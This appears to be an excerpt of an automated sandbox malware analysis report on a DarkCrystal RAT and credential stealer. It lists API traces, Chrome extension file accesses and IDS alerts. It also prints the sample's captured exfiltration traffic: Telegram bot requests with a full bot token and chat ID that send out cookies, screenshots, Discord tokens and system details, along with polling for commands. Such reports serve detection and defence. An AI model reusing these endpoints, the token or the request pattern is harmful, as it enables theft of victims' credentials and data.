Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Code function: 5_2_0042C4A8 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	5_2_0042C4A8
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Code function: 5_2_0043E560 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	5_2_0043E560
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Code function: 5_2_0044D998 FindFirstFileExA,	5_2_0044D998
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF6447A7F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	6_2_00007FF6447A7F4C
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF6447B1FE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	6_2_00007FF6447B1FE4
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF6447A7F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	6_2_00007FF6447A7F4C
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF644798B00 FindFirstFileExW,FindClose,	6_2_00007FF644798B00
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_0000020694EFDCE0 FindFirstFileExW,	7_2_0000020694EFDCE0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF6936983C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	7_2_00007FF6936983C0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF693699280 FindFirstFileExW,FindClose,	7_2_00007FF693699280
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF6936B1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	7_2_00007FF6936B1874
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_000001F16E7ADCE0 FindFirstFileExW,	8_2_000001F16E7ADCE0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF693699280 FindFirstFileExW,FindClose,	8_2_00007FF693699280
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF6936983C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	8_2_00007FF6936983C0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF6936B1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	8_2_00007FF6936B1874

Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:56199 -> 194.58.42.154:80
Source: Network traffic	Suricata IDS: 2048130 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Exfiltration (POST) : 192.168.2.5:56199 -> 194.58.42.154:80

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendDocument?chat_id=-1002245526003&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0.28%20kb) HTTP/1.1Content-Type: multipart/form-data; boundary="ca64f802-3e8f-4ecc-96f4-25fd6e73bf55"Host: api.telegram.orgContent-Length: 588Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendMessage?chat_id=-1002245526003&text=%F0%9F%92%8EDiscord%20tokens:%0A HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendMessage?chat_id=-1002245526003&text=%0A%F0%9F%96%A5Computer%20info:%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AComputer%20name:%20065367%0AUser%20name:%20user%0ASystem%20time:%202024-09-02%2010:50:41%20am%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20654VB%0ARAM:%204095%20MB%0AHWID:%2073CF150472%0A%0A%F0%9F%9B%A1Security:%0AInstalled%20antivirus:%20Windows%20Defender.%0AStarted%20as%20admin:%20True HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: POST /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendDocument?chat_id=-1002245526003&caption=%F0%9F%93%B8Screenshot%20taken HTTP/1.1Content-Type: multipart/form-data; boundary="208c70bd-783e-4a63-920d-c8fb9fd1ecc9"Host: api.telegram.orgContent-Length: 86217Expect: 100-continue
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendMessage?chat_id=-1002245526003&text=%E2%9A%A1%EF%B8%8FBot%20connected:%0AUsername:%20user,%20Location:%20United%20States%20[US],%20New%20York,%20ID:%204070%0A%E2%84%B9%EF%B8%8FSend%20%22/4070*help%22%20to%20see%20the%20command%20list%0A%F0%9F%92%8EVersion:%202.8 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendMessage?chat_id=-1002245526003&text=%E2%9A%A1%EF%B8%8FBot%20connected:%0AUsername:%20user,%20Location:%20United%20States%20[US],%20New%20York,%20ID:%202919%0A%E2%84%B9%EF%B8%8FSend%20%22/2919*help%22%20to%20see%20the%20command%20list%0A%F0%9F%92%8EVersion:%202.8 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 185.199.108.133 185.199.108.133

Source: Joe Sandbox View

ASN Name: TELEGRAMRU TELEGRAMRU

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: ip-api.com
Source: unknown	DNS query: name: ip-api.com
Source: unknown	DNS query: name: ip-api.com

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56208 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56202 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56210 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56213 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56195 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56206 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56204 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56203 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56207 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56197 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56198 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56209 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56218 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56211 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56212 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56220 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56221 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56226 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56223 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56230 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56233 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56194 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56245 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56240 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56262 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56264 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56251 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56200 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56243 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56237 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56234 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56274 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56244 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56224 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56259 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56275 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56260 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56236 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56248 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56227 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56265 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56261 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56231 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56276 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56255 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56271 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56239 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56270 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56277 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56254 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56267 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56249 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:56278 -> 149.154.167.220:443
